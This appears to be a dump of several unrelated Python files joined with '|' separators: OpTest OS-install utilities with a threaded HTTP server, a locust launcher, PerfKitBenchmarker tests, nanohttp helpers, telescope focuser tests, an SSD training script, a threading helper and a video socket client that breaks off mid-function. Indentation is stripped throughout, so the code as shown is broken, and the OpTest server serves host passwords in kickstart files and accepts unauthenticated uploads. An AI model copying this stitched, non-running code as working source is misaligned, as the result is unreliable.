# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
# OpTest Install Utils
#
import shutil
import urllib2
import os
import threading
import SocketServer
import BaseHTTPServer
import SimpleHTTPServer
import cgi
import commands
import time
from Exceptions import CommandFailed
import OpTestConfiguration
BASE_PATH = ""
INITRD = ""
VMLINUX = ""
KS = ""
DISK = ""
USERNAME = ""
PASSWORD = ""
REPO = ""
BOOTPATH = ""
conf = OpTestConfiguration.conf
uploaded_files = {}
class InstallUtil():
def __init__(self, base_path="", initrd="", vmlinux="",
ks="", boot_path="", repo=""):
global BASE_PATH
global INITRD
global VMLINUX
global KS
global DISK
global USERNAME
global PASSWORD
global BOOTPATH
global REPO
global PROXY
self.conf = conf
self.host = conf.host()
self.system = conf.system()
self.system.host_console_unique_prompt()
self.console = self.system.sys_get_ipmi_console()
self.server = ""
self.repo = conf.args.os_repo
REPO = self.repo
DISK = self.host.get_scratch_disk()
USERNAME = self.host.username()
PASSWORD = self.host.password()
BOOTPATH = boot_path
BASE_PATH = base_path
INITRD = initrd
VMLINUX = vmlinux
PROXY = self.host.get_proxy()
KS = ks
def wait_for_network(self):
retry = 6
while retry > 0:
try:
self.console.run_command("ifconfig -a")
return True
except CommandFailed as cf:
if cf.exitcode == 1:
time.sleep(5)
retry = retry - 1
pass
else:
raise cf
def ping_network(self):
retry = 6
while retry > 0:
try:
ip = self.conf.args.host_gateway
if ip in [None, ""]:
ip = self.system.get_my_ip_from_host_perspective()
cmd = "ping %s -c 1" % ip
self.console.run_command(cmd)
return True
except CommandFailed as cf:
if retry == 1:
raise cf
if cf.exitcode == 1:
time.sleep(5)
retry = retry - 1
pass
else:
raise cf
def assign_ip_petitboot(self):
"""
Assign host ip in petitboot
"""
self.console.run_command("stty cols 300")
self.console.run_command("stty rows 30")
# Lets reduce timeout in petitboot
self.console.run_command("nvram --update-config petitboot,timeout=10")
cmd = "ip addr|grep -B1 -i %s|grep BROADCAST|awk -F':' '{print $2}'" % self.conf.args.host_mac
iface = self.console.run_command(cmd)[0].strip()
cmd = "ifconfig %s %s netmask %s" % (iface, self.host.ip, self.conf.args.host_submask)
self.console.run_command(cmd)
cmd = "route add default gateway %s" % self.conf.args.host_gateway
self.console.run_command_ignore_fail(cmd)
cmd = "echo 'nameserver %s' > /etc/resolv.conf" % self.conf.args.host_dns
self.console.run_command(cmd)
def get_server_ip(self):
"""
Get IP of server where test runs
"""
my_ip = ""
self.wait_for_network()
# Check if ip is assigned in petitboot
try:
self.ping_network()
except CommandFailed as cf:
self.assign_ip_petitboot()
self.ping_network()
retry = 30
while retry > 0:
try:
my_ip = self.system.get_my_ip_from_host_perspective()
print repr(my_ip)
self.console.run_command("ping %s -c 1" % my_ip)
break
except CommandFailed as cf:
if cf.exitcode == 1:
time.sleep(1)
retry = retry - 1
pass
else:
raise cf
return my_ip
def get_uploaded_file(self, name):
return uploaded_files.get(name)
def start_server(self, server_ip):
"""
Start local http server
"""
HOST, PORT = "0.0.0.0", 0
global REPO
self.server = ThreadedHTTPServer((HOST, PORT), ThreadedHTTPHandler)
ip, port = self.server.server_address
if not REPO:
REPO = "http://%s:%s/repo" % (server_ip, port)
print "# Listening on %s:%s" % (ip, port)
server_thread = threading.Thread(target=self.server.serve_forever)
server_thread.daemon = True
server_thread.start()
print "# Server running in thread:", server_thread.name
return port
def stop_server(self):
"""
Stops local http server
"""
self.server.shutdown()
self.server.server_close()
return
def setup_repo(self, cdrom):
"""
Sets up repo from given cdrom.
Check if given cdrom is url or file
if url, download in the BASE_PATH and
mount to repo folder
:params cdrom: OS cdrom path local or remote
"""
repo_path = os.path.join(BASE_PATH, 'repo')
abs_repo_path = os.path.abspath(repo_path)
# Clear already mount repo
if os.path.ismount(repo_path):
status, output = commands.getstatusoutput("umount %s" % abs_repo_path)
if status != 0:
print "failed to unmount", abs_repo_path
return ""
elif os.path.isdir(repo_path):
shutil.rmtree(repo_path)
else:
pass
if not os.path.isdir(repo_path):
os.makedirs(abs_repo_path)
if os.path.isfile(cdrom):
cdrom_path = cdrom
else:
cdrom_url = urllib2.urlopen(cdrom)
if not cdrom_url:
print "Unknown cdrom path %s" % cdrom
return ""
with open(os.path.join(BASE_PATH, "iso"), 'wb') as f:
f.write(cdrom_url.read())
cdrom_path = os.path.join(BASE_PATH, "iso")
cmd = "mount -t iso9660 -o loop %s %s" % (cdrom_path, abs_repo_path)
status, output = commands.getstatusoutput(cmd)
if status != 0:
print "Failed to mount iso %s on %s\n %s" % (cdrom, abs_repo_path, output)
return ""
return abs_repo_path
def extract_install_files(self, repo_path):
"""
extract the install file from given repo path
:params repo_path: os repo path either local or remote
"""
vmlinux_src = os.path.join(repo_path, BOOTPATH, VMLINUX)
initrd_src = os.path.join(repo_path, BOOTPATH, INITRD)
vmlinux_dst = os.path.join(BASE_PATH, VMLINUX)
initrd_dst = os.path.join(BASE_PATH, INITRD)
# let us make sure, no old vmlinux, initrd
if os.path.isfile(vmlinux_dst):
os.remove(vmlinux_dst)
if os.path.isfile(initrd_dst):
os.remove(initrd_dst)
if os.path.isdir(repo_path):
try:
shutil.copyfile(vmlinux_src, vmlinux_dst)
shutil.copyfile(initrd_src, initrd_dst)
except Exception:
return False
else:
vmlinux_file = urllib2.urlopen(vmlinux_src)
initrd_file = urllib2.urlopen(initrd_src)
if not (vmlinux_file and initrd_file):
print "Unknown repo path %s, %s" % (vmlinux_src, initrd_src)
return False
try:
with open(vmlinux_dst, 'wb') as f:
f.write(vmlinux_file.read())
with open(initrd_dst, 'wb') as f:
f.write(initrd_file.read())
except Exception:
return False
return True
def set_bootable_disk(self, disk):
"""
Sets the given disk as default bootable entry in petitboot
"""
self.system.sys_set_bootdev_no_override()
self.system.host_console_unique_prompt()
self.console.run_command("stty cols 300")
self.console.run_command("stty rows 30")
# FIXME: wait till the device(disk) discovery in petitboot
time.sleep(60)
cmd = 'blkid %s*' % disk
output = self.console.run_command(cmd)
uuid = output[0].split(':')[1].split('=')[1].replace("\"", "")
cmd = 'nvram --update-config "auto-boot?=true"'
output = self.console.run_command(cmd)
cmd = 'nvram --update-config petitboot,bootdevs=uuid:%s' % uuid
output = self.console.run_command(cmd)
cmd = 'nvram --print-config'
output = self.console.run_command(cmd)
return
class ThreadedHTTPHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_HEAD(self):
# FIXME: Local repo unable to handle http request while installation
# Avoid using cdrom if your kickstart file needs repo, if installation
# just needs vmlinx and initrd from cdrom, cdrom still can be used.
if "repo" in self.path:
self.path = BASE_PATH + self.path
f = self.send_head()
if f:
f.close()
else:
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
def do_GET(self):
if "repo" in self.path:
self.path = BASE_PATH + self.path
f = self.send_head()
if f:
try:
self.copyfile(f, self.wfile)
finally:
f.close()
else:
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
print "# Webserver was asked for: ", self.path
if self.path == "/%s" % VMLINUX:
f = open("%s/%s" % (BASE_PATH, VMLINUX), "r")
d = f.read()
self.wfile.write(d)
f.close()
return
elif self.path == "/%s" % INITRD:
f = open("%s/%s" % (BASE_PATH, INITRD), "r")
d = f.read()
self.wfile.write(d)
f.close()
return
elif self.path == "/%s" % KS:
f = open("%s/%s" % (BASE_PATH, KS), "r")
d = f.read()
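# the kickstart/preseed template read above is filled in via str.format with
# distro-specific values (repo, proxy, credentials, scratch disk, package list)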
if "hostos" in BASE_PATH:
ps = d.format(REPO, PROXY, PASSWORD, DISK, DISK, DISK)
elif "rhel" in BASE_PATH:
ps = d.format(REPO, PROXY, PASSWORD, DISK, DISK, DISK)
elif "ubuntu" in BASE_PATH:
user = USERNAME
if user == 'root':
user = 'ubuntu'
packages = "openssh-server build-essential lvm2 ethtool "
packages+= "nfs-common ssh ksh lsvpd nfs-kernel-server iprutils procinfo "
packages+= "sg3-utils lsscsi libaio-dev libtime-hires-perl "
packages+= "acpid tgt openjdk-8* zip git automake python "
packages+= "expect gcc g++ gdb "
packages+= "python-dev p7zip python-stevedore python-setuptools "
packages+= "libvirt-dev numactl libosinfo-1.0-0 python-pip "
packages+= "linux-tools-common linux-tools-generic lm-sensors "
packages+= "ipmitool i2c-tools pciutils opal-prd opal-utils "
packages+= "device-tree-compiler fwts"
ps = d.format("openpower", "example.com",
PROXY, PASSWORD, PASSWORD, user, PASSWORD, PASSWORD, DISK, packages)
else:
print "unknown distro"
return
self.wfile.write(ps)
return
else:
self.send_response(404)
return
def do_POST(self):
path = os.path.normpath(self.path)
path = path[1:]
path_elements = path.split('/')
print "INCOMING"
print repr(path)
print repr(path_elements)
if path_elements[0] != "upload":
return
form = cgi.FieldStorage(
fp = self.rfile,
headers = self.headers,
environ={ "REQUEST_METHOD": "POST",
"CONTENT_TYPE": self.headers['Content-Type']})
uploaded_files[form["file"].filename] = form["file"].value
self.wfile.write("Success")
class ThreadedHTTPServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
pass
|
locusts.py
|
#! python3
# -*- encoding: utf-8 -*-
'''
Current module: httplocust.locusts
Rough version history:
v1.0 Original version to use
********************************************************************
@AUTHOR: Administrator-Bruce Luo(罗科峰)
MAIL: luokefeng@163.com
RCS: httplocust.locusts, v1.0 2018-10-23
FROM: 2018-10-23
********************************************************************
======================================================================
this module reference from httprunner
'''
import io
import multiprocessing
import os
import sys
from rtsf.p_applog import color_print
from rtsf.p_testcase import YamlCaseLoader
from locust.main import main
def parse_locustfile(file_path):
""" parse testcase file and return locustfile path.
if file_path is a Python file, assume it is a locustfile
if file_path is a YAML/JSON file, convert it to locustfile
"""
if not os.path.isfile(file_path):
color_print("file path invalid, exit.", "RED")
sys.exit(1)
file_suffix = os.path.splitext(file_path)[1]
if file_suffix == ".py":
locustfile_path = file_path
elif file_suffix in ['.yaml', '.yml', '.json']:
locustfile_path = gen_locustfile(file_path)
else:
# '' or other suffix
color_print("file type should be YAML/JSON/Python, exit.", "RED")
sys.exit(1)
return locustfile_path
def gen_locustfile(testcase_file_path):
""" generate locustfile from template.
"""
locustfile_path = 'locustfile.py'
template_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"template",
"locustfile_template"
)
YamlCaseLoader.load_dependencies(testcase_file_path)
testset = YamlCaseLoader.load_file(testcase_file_path)
host = testset.get("project", {}).get("locust", {}).get("host", "")
with io.open(template_path, encoding='utf-8') as template:
with io.open(locustfile_path, 'w', encoding='utf-8') as locustfile:
template_content = template.read()
template_content = template_content.replace("$HOST", host)
template_content = template_content.replace("$TESTCASE_FILE", testcase_file_path)
locustfile.write(template_content)
return locustfile_path
def start_master(sys_argv):
sys_argv.append("--master")
sys.argv = sys_argv
main()
def start_slave(sys_argv):
if "--slave" not in sys_argv:
sys_argv.extend(["--slave"])
sys.argv = sys_argv
main()
def run_locusts_with_processes(sys_argv, processes_count):
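# spawn `processes_count` locust slave processes; unless this invocation was
# itself started as a slave, run the master in the current process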
processes = []
manager = multiprocessing.Manager()
for _ in range(processes_count):
p_slave = multiprocessing.Process(target=start_slave, args=(sys_argv,))
p_slave.daemon = True
p_slave.start()
processes.append(p_slave)
try:
if "--slave" in sys_argv:
[process.join() for process in processes]
else:
start_master(sys_argv)
except KeyboardInterrupt:
manager.shutdown()
|
vm_util_test.py
|
# Copyright 2014 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for perfkitbenchmarker.vm_util."""
import functools
import multiprocessing
import multiprocessing.managers
import os
import psutil
import subprocess
import threading
import time
import unittest
import mock
from perfkitbenchmarker import errors
from perfkitbenchmarker import vm_util
class ShouldRunOnInternalIpAddressTestCase(unittest.TestCase):
def setUp(self):
p = mock.patch(vm_util.__name__ + '.FLAGS')
self.flags = p.start()
self.flags_patch = p
self.sending_vm = mock.MagicMock()
self.receiving_vm = mock.MagicMock()
def tearDown(self):
self.flags_patch.stop()
def _RunTest(self, expectation, ip_addresses, is_reachable=True):
self.flags.ip_addresses = ip_addresses
self.sending_vm.IsReachable.return_value = is_reachable
self.assertEqual(
expectation,
vm_util.ShouldRunOnInternalIpAddress(
self.sending_vm, self.receiving_vm))
def testExternal_Reachable(self):
self._RunTest(False, vm_util.IpAddressSubset.EXTERNAL, True)
def testExternal_Unreachable(self):
self._RunTest(False, vm_util.IpAddressSubset.EXTERNAL, False)
def testInternal_Reachable(self):
self._RunTest(True, vm_util.IpAddressSubset.INTERNAL, True)
def testInternal_Unreachable(self):
self._RunTest(True, vm_util.IpAddressSubset.INTERNAL, False)
def testBoth_Reachable(self):
self._RunTest(True, vm_util.IpAddressSubset.BOTH, True)
def testBoth_Unreachable(self):
self._RunTest(True, vm_util.IpAddressSubset.BOTH, False)
def testReachable_Reachable(self):
self._RunTest(True, vm_util.IpAddressSubset.REACHABLE, True)
def testReachable_Unreachable(self):
self._RunTest(
False, vm_util.IpAddressSubset.REACHABLE, False)
def HaveSleepSubprocess():
"""Checks if the current process has a sleep subprocess."""
for child in psutil.Process(os.getpid()).children(recursive=True):
if 'sleep' in child.cmdline():
return True
return False
class WaitUntilSleepTimer(threading.Thread):
"""Timer that waits for a sleep subprocess to appear.
This is intended for specific tests that want to trigger timer
expiry as soon as it detects that a subprocess is executing a
"sleep" command.
It assumes that the test driver is not parallelizing the tests using
this method since that may lead to inconsistent results.
TODO(klausw): If that's an issue, could add a unique fractional part
to the sleep command args to distinguish them.
"""
def __init__(self, interval, function):
threading.Thread.__init__(self)
self.end_time = time.time() + interval
self.function = function
self.finished = threading.Event()
self.have_sleep = threading.Event()
def WaitForSleep():
while not self.finished.is_set():
if HaveSleepSubprocess():
self.have_sleep.set()
break
time.sleep(0) # yield to other Python threads
threading.Thread(target=WaitForSleep).run()
def cancel(self):
self.finished.set()
def run(self):
while time.time() < self.end_time and not self.have_sleep.is_set():
time.sleep(0) # yield to other Python threads
if not self.finished.is_set():
self.function()
self.finished.set()
def _ReturnArgs(a, b=None):
return b, a
def _RaiseValueError():
raise ValueError('ValueError')
def _IncrementCounter(lock, counter):
with lock:
counter.value += 1
def _AppendLength(int_list):
int_list.append(len(int_list))
class GetCallStringTestCase(unittest.TestCase):
def testNoArgs(self):
result = vm_util._GetCallString((_ReturnArgs, (), {}))
self.assertEqual(result, '_ReturnArgs()')
def testArgs(self):
result = vm_util._GetCallString((_ReturnArgs, ('blue', 5), {}))
self.assertEqual(result, '_ReturnArgs(blue, 5)')
def testKwargs(self):
result = vm_util._GetCallString((_ReturnArgs, (), {'x': 8}))
self.assertEqual(result, '_ReturnArgs(x=8)')
def testArgsAndKwargs(self):
result = vm_util._GetCallString((_ReturnArgs, ('blue', 5), {'x': 8}))
self.assertEqual(result, '_ReturnArgs(blue, 5, x=8)')
def testSinglePartial(self):
_ReturnArgs2 = functools.partial(_ReturnArgs, 1, x=2)
result = vm_util._GetCallString((_ReturnArgs2, (), {}))
self.assertEqual(result, '_ReturnArgs(1, x=2)')
result = vm_util._GetCallString((_ReturnArgs2, ('blue', 5), {'x': 8}))
self.assertEqual(result, '_ReturnArgs(1, blue, 5, x=8)')
def testDoublePartial(self):
_ReturnArgs2 = functools.partial(_ReturnArgs, 1, x=2)
_ReturnArgs3 = functools.partial(_ReturnArgs2, 3, x=4)
result = vm_util._GetCallString((_ReturnArgs3, (), {}))
self.assertEqual(result, '_ReturnArgs(1, 3, x=4)')
result = vm_util._GetCallString((_ReturnArgs3, ('blue', 5), {'x': 8}))
self.assertEqual(result, '_ReturnArgs(1, 3, blue, 5, x=8)')
class RunParallelThreadsTestCase(unittest.TestCase):
def testFewerThreadsThanConcurrencyLimit(self):
calls = [(_ReturnArgs, ('a',), {'b': i}) for i in range(2)]
result = vm_util.RunParallelThreads(calls, max_concurrency=4)
self.assertEqual(result, [(0, 'a'), (1, 'a')])
def testMoreThreadsThanConcurrencyLimit(self):
calls = [(_ReturnArgs, ('a',), {'b': i}) for i in range(10)]
result = vm_util.RunParallelThreads(calls, max_concurrency=4)
self.assertEqual(result, [(i, 'a') for i in range(10)])
def testException(self):
int_list = []
calls = [(_AppendLength, (int_list,), {}), (_RaiseValueError, (), {}),
(_AppendLength, (int_list,), {})]
with self.assertRaises(errors.VmUtil.ThreadException):
vm_util.RunParallelThreads(calls, max_concurrency=1)
self.assertEqual(int_list, [0, 1])
class RunThreadedTestCase(unittest.TestCase):
def testNonListParams(self):
with self.assertRaises(ValueError):
vm_util.RunThreaded(_ReturnArgs, 'blue')
def testNoParams(self):
result = vm_util.RunThreaded(_ReturnArgs, [])
self.assertEqual(result, [])
def testInvalidTupleParams(self):
with self.assertRaises(ValueError):
vm_util.RunThreaded(_ReturnArgs, [('blue', 'red')])
def testSimpleListParams(self):
result = vm_util.RunThreaded(_ReturnArgs, ['blue', 'red'])
self.assertEqual(result, [(None, 'blue'), (None, 'red')])
def testListOfTupleParams(self):
result = vm_util.RunThreaded(
_ReturnArgs, [(('red',), {}), (('green',), {'b': 'blue'})])
self.assertEqual(result, [(None, 'red'), ('blue', 'green')])
class RunParallelProcessesTestCase(unittest.TestCase):
def testFewerThreadsThanConcurrencyLimit(self):
calls = [(_ReturnArgs, ('a',), {'b': i}) for i in range(2)]
result = vm_util.RunParallelProcesses(calls, max_concurrency=4)
self.assertEqual(result, [(0, 'a'), (1, 'a')])
def testMoreThreadsThanConcurrencyLimit(self):
calls = [(_ReturnArgs, ('a',), {'b': i}) for i in range(10)]
result = vm_util.RunParallelProcesses(calls, max_concurrency=4)
self.assertEqual(result, [(i, 'a') for i in range(10)])
def testException(self):
manager = multiprocessing.managers.SyncManager()
manager.start()
lock = manager.Lock()
counter = manager.Value('i', 0)
calls = [(_IncrementCounter, (lock, counter), {}),
(_RaiseValueError, (), {}),
(_IncrementCounter, (lock, counter), {})]
with self.assertRaises(errors.VmUtil.CalledProcessException):
vm_util.RunParallelProcesses(calls, max_concurrency=1)
self.assertEqual(counter.value, 2)
class IssueCommandTestCase(unittest.TestCase):
def testTimeoutNotReached(self):
_, _, retcode = vm_util.IssueCommand(['sleep', '0s'])
self.assertEqual(retcode, 0)
@mock.patch('threading.Timer', new=WaitUntilSleepTimer)
def testTimeoutReached(self):
_, _, retcode = vm_util.IssueCommand(['sleep', '2s'], timeout=1)
self.assertEqual(retcode, -9)
self.assertFalse(HaveSleepSubprocess())
def testNoTimeout(self):
_, _, retcode = vm_util.IssueCommand(['sleep', '0s'], timeout=None)
self.assertEqual(retcode, 0)
def testNoTimeout_ExceptionRaised(self):
with mock.patch('subprocess.Popen', spec=subprocess.Popen) as mock_popen:
mock_popen.return_value.communicate.side_effect = KeyboardInterrupt()
with self.assertRaises(KeyboardInterrupt):
vm_util.IssueCommand(['sleep', '2s'], timeout=None)
self.assertFalse(HaveSleepSubprocess())
if __name__ == '__main__':
unittest.main()
|
helpers.py
|
import cgi
import threading
import pymlconf
import ujson
from . import exceptions
from .configuration import settings, configure
class LazyAttribute:
""" ``LazyAttribute`` decorator is intended to promote a
function call to object attribute. This means the
function is called once and replaced with
returned value.
>>> class A:
... def __init__(self):
... self.counter = 0
... @LazyAttribute
... def count(self):
... self.counter += 1
... return self.counter
>>> a = A()
>>> a.count
1
>>> a.count
1
"""
__slots__ = ('f', )
def __init__(self, f):
self.f = f
def __get__(self, obj, t=None):
f = self.f
if obj is None:
return f
val = f(obj)
setattr(obj, f.__name__, val)
return val
def quickstart(controller=None, application=None, host='localhost', port=8080,
block=True, config=None):
from wsgiref.simple_server import make_server
try:
settings.debug
except pymlconf.ConfigurationNotInitializedError:
configure()
if config:
settings.merge(config)
if application is not None:
app = application
elif controller is None:
from wsgiref.simple_server import demo_app
app = demo_app
else:
from nanohttp.application import Application
app = Application(root=controller)
port = int(port)
httpd = make_server(host, port, app)
print("Serving http://%s:%d" % (host or 'localhost', port))
if block: # pragma: no cover
httpd.serve_forever()
else:
t = threading.Thread(target=httpd.serve_forever, daemon=True)
t.start()
def shutdown():
httpd.shutdown()
httpd.server_close()
t.join()
return shutdown
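# Usage sketch (illustrative; ``Root`` is a hypothetical nanohttp controller, not
# defined here). With block=False the server runs in a daemon thread and the
# returned callable shuts it down:
#
#     shutdown = quickstart(controller=Root(), host='localhost', port=8080, block=False)
#     ...  # issue requests against http://localhost:8080
#     shutdown()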
def get_cgi_field_value(field):
# noinspection PyProtectedMember
return field.value if isinstance(field, cgi.MiniFieldStorage) \
or (isinstance(field, cgi.FieldStorage) and not field._binary_file) \
else field
def parse_any_form(environ, content_length=None, content_type=None):
if content_type == 'application/json':
if content_length is None:
raise exceptions.HTTPBadRequest('Content-Length required')
fp = environ['wsgi.input']
data = fp.read(content_length)
try:
return ujson.decode(data)
except (ValueError, TypeError):
raise exceptions.HTTPBadRequest('Cannot parse the request')
try:
storage = cgi.FieldStorage(
fp=environ['wsgi.input'],
environ=environ,
strict_parsing=False,
keep_blank_values=True
)
except (TypeError, ValueError):
raise exceptions.HTTPBadRequest('Cannot parse the request')
result = {}
if storage.list is None or not len(storage.list):
return result
for k in storage:
v = storage[k]
if isinstance(v, list):
result[k] = [get_cgi_field_value(i) for i in v]
else:
result[k] = get_cgi_field_value(v)
return result
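# Minimal JSON sketch (assumed inputs, not taken from this module's tests; ``io``
# would need to be imported for it to run):
#
#     environ = {'wsgi.input': io.BytesIO(b'{"a": 1}')}
#     parse_any_form(environ, content_length=8, content_type='application/json')
#     # -> {'a': 1}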
|
test_focuser.py
|
import time
import pytest
from threading import Thread
from panoptes.utils.config.helpers import load_config
from panoptes.pocs.focuser.simulator import Focuser as SimFocuser
from panoptes.pocs.focuser.birger import Focuser as BirgerFocuser
from panoptes.pocs.focuser.focuslynx import Focuser as FocusLynxFocuser
from panoptes.pocs.camera.simulator.dslr import Camera
params = [SimFocuser, BirgerFocuser, FocusLynxFocuser]
ids = ['simulator', 'birger', 'focuslynx']
# Ugly hack to access id inside fixture
@pytest.fixture(scope='function', params=zip(params, ids), ids=ids)
def focuser(request):
if request.param[0] == SimFocuser:
# Simulated focuser, just create one and return it
return request.param[0]()
else:
# Load the local config file and look for focuser configurations of the specified type
focuser_configs = []
local_config = load_config('pocs_local', load_local=True)
camera_info = local_config.get('cameras')
if camera_info:
# Local config file has a cameras section
camera_configs = camera_info.get('devices')
if camera_configs:
# Local config file camera section has a devices list
for camera_config in camera_configs:
if camera_config:
focuser_config = camera_config.get('focuser', None)
if focuser_config and focuser_config['model'] == request.param[1]:
# Camera config has a focuser section, and it's the right type
focuser_configs.append(focuser_config)
if not focuser_configs:
pytest.skip(
"Found no {} configurations in pocs_local.yaml, skipping tests".format(
request.param[1]))
# Create and return a Focuser based on the first config
return request.param[0](**focuser_configs[0])
@pytest.fixture(scope='function')
def tolerance(focuser):
"""
Tolerance for confirming focuser has moved to the requested position. The Birger may be
1 or 2 encoder steps off.
"""
if isinstance(focuser, SimFocuser):
return 0
elif isinstance(focuser, BirgerFocuser):
return 2
elif isinstance(focuser, FocusLynxFocuser):
return 0
def test_init(focuser):
"""
Confirm proper init & exercise some of the property getters
"""
assert focuser.is_connected
    # Expect UID to be a string (or integer?) of non-zero length; just assert it is truthy
assert focuser.uid
def test_move_to(focuser, tolerance):
focuser.move_to(100)
assert focuser.position == pytest.approx(100, abs=tolerance)
def test_move_by(focuser, tolerance):
focuser.move_to(100)
previous_position = focuser.position
increment = -13
focuser.move_by(increment)
assert focuser.position == pytest.approx((previous_position + increment), abs=tolerance)
def test_is_ready(focuser):
move_thread = Thread(target=focuser.move_by, args=[13])
assert not focuser.is_moving
assert focuser.is_ready
move_thread.start()
time.sleep(0.01)
assert focuser.is_moving
assert not focuser.is_ready
move_thread.join()
assert not focuser.is_moving
assert focuser.is_ready
def test_position_setter(focuser, tolerance):
"""
Can assign to position property as an alternative to move_to() method
"""
focuser.position = 75
assert focuser.position == pytest.approx(75, abs=tolerance)
def test_move_below_min_position(focuser, tolerance):
    focuser.move_to(focuser.min_position - 100)
    assert focuser.position == pytest.approx(focuser.min_position, abs=tolerance)
def test_move_above_max_position(focuser, tolerance):
    focuser.move_to(focuser.max_position + 100)
    assert focuser.position == pytest.approx(focuser.max_position, abs=tolerance)
def test_camera_association(focuser):
"""
Test association of Focuser with Camera after initialisation (getter, setter)
"""
sim_camera_1 = Camera()
sim_camera_2 = Camera()
    # Focusers from the fixture haven't been associated with a Camera yet, so this should work
focuser.camera = sim_camera_1
assert focuser.camera is sim_camera_1
# Attempting to associate with a second Camera should fail, though.
focuser.camera = sim_camera_2
assert focuser.camera is sim_camera_1
def test_camera_init():
"""
Test focuser init via Camera constructor
"""
sim_camera = Camera(focuser={'model': 'panoptes.pocs.focuser.simulator.Focuser',
'focus_port': '/dev/ttyFAKE'})
assert isinstance(sim_camera.focuser, SimFocuser)
assert sim_camera.focuser.is_connected
assert sim_camera.focuser.uid
assert sim_camera.focuser.camera is sim_camera
def test_camera_association_on_init():
"""
Test association of Focuser with Camera during Focuser init
"""
sim_camera = Camera()
focuser = SimFocuser(camera=sim_camera)
assert focuser.camera is sim_camera
|
trainer.py
|
"""
training script
date: 10/4
author: arabian9ts
"""
# escape matplotlib error
import matplotlib
matplotlib.use('Agg')
# escape tensorflow warning
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import datetime
import tensorflow as tf
import numpy as np
import pickle
import threading
import matplotlib.pyplot as plt
from util.util import *
from tqdm import trange
from model.ssd300 import *
# ====================== Training Parameters ====================== #
BATCH_SIZE = 10
EPOCH = 200
EPOCH_LOSSES = []
SHUFFLED_INDECES = []
USE_MANGA109 = True
# ============================== END ============================== #
if __name__ == '__main__':
sess = tf.Session()
buff = []
if USE_MANGA109:
pickle_file = 'Manga109.pkl'
folder_name = 'Manga109/'
else:
pickle_file = 'VOC2007.pkl'
folder_name = 'voc2007/'
# load pickle data set annotation
with open(pickle_file, 'rb') as f:
data = pickle.load(f)
keys = sorted(data.keys())
BATCH = int(len(keys) / BATCH_SIZE)
def next_batch():
        global buff, BATCH_SIZE, SHUFFLED_INDECES
mini_batch = []
actual_data = []
if 0 == len(SHUFFLED_INDECES):
SHUFFLED_INDECES = list(np.random.permutation(len(keys)))
indices = SHUFFLED_INDECES[:min(BATCH_SIZE, len(SHUFFLED_INDECES))]
del SHUFFLED_INDECES[:min(BATCH_SIZE, len(SHUFFLED_INDECES))]
for idx in indices:
# make images mini batch
img, _, _, _, = preprocess(folder_name + keys[idx])
actual_data.append(data[keys[idx]])
mini_batch.append(img)
buff.append((mini_batch, actual_data))
# tensorflow session
ssd = SSD300(sess)
sess.run(tf.global_variables_initializer())
# parameter saver
saver = tf.train.Saver()
# saver.restore(sess, './checkpoints/params.ckpt')
SHUFFLED_INDECES = list(np.random.permutation(len(keys)))
print('\nSTART LEARNING')
print('==================== '+str(datetime.datetime.now())+' ====================')
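    # Prefetch a handful of mini-batches so training never waits on disk I/O;
    # inside the epoch loop below, every consumed batch is replaced by a
    # background thread running next_batch().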
for _ in range(5):
next_batch()
for ep in range(EPOCH):
BATCH_LOSSES = []
for ba in trange(BATCH):
batch, actual = buff.pop(0)
threading.Thread(name='load', target=next_batch).start()
_, _, batch_loc, batch_conf, batch_loss = ssd.train(batch, actual)
BATCH_LOSSES.append(batch_loss)
# print('BATCH: {0} / EPOCH: {1}, LOSS: {2}'.format(ba+1, ep+1, batch_loss))
EPOCH_LOSSES.append(np.mean(BATCH_LOSSES))
print('\n*** AVERAGE: '+str(EPOCH_LOSSES[-1])+' ***')
saver.save(sess, './checkpoints/params.ckpt')
print('\n========== EPOCH: '+str(ep+1)+' END ==========')
print('\nEND LEARNING')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.plot(np.array(range(EPOCH)), EPOCH_LOSSES)
plt.grid()
plt.savefig("loss.png")
plt.show()
print('==================== '+str(datetime.datetime.now())+' ====================')
|
Process.py
|
import threading
class ProcessParallel(object):
#Thanks https://stackoverflow.com/questions/11968689/python-multithreading-wait-till-all-threads-finished
def __init__(self, *jobs):
self.jobs = jobs
self.processes = []
self.processes_url = []
self.processes_extra = []
def append_process(self, *job, url=None, extra=None):
self.jobs = self.jobs + job
        if url is not None and extra is not None:
self.processes_url.append(url)
self.processes_extra.append(extra)
def fork_processes(self):
count = -1
for job in self.jobs:
try:
if (count == -1):
proc = threading.Thread(target=job)
self.processes.append(proc)
count+=1
else:
proc = threading.Thread(target=job, args=(self.processes_url[count], self.processes_extra[count]))
self.processes.append(proc)
count+=1
except Exception:
pass
def start_all(self):
for proc in self.processes:
proc.start()
def join_all(self):
for proc in self.processes:
proc.join()
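# Usage sketch (illustrative; warm_up and fetch are hypothetical callables).
# The first job gets no arguments, every appended job receives (url, extra):
#
#     pp = ProcessParallel(warm_up)
#     pp.append_process(fetch, url="http://example.com", extra=1)
#     pp.fork_processes()
#     pp.start_all()
#     pp.join_all()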
|
videoGet.py
|
from threading import Thread
import socket
import struct
import time
class VideoGet():
def __init__(self, ui):
self.HOST = "169.254.196.68"
self._PORT = 8485
self.frame_data_send = ""
self._ui = ui
def connect(self):
while True:
if self._ui.camera_var == 0:
self._ui.st_cameratype_lb_text = "Close"
time.sleep(1)
continue
elif self._ui.camera_var == 1:
self._ui.st_cameratype_lb_text = "Front is Waiting"
self._PORT = 8480
elif self._ui.camera_var == 2:
self._ui.st_cameratype_lb_text = "Bottom is Waiting"
self._PORT = 8485
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.settimeout(1)
print('Socket created Video_Getter')
try:
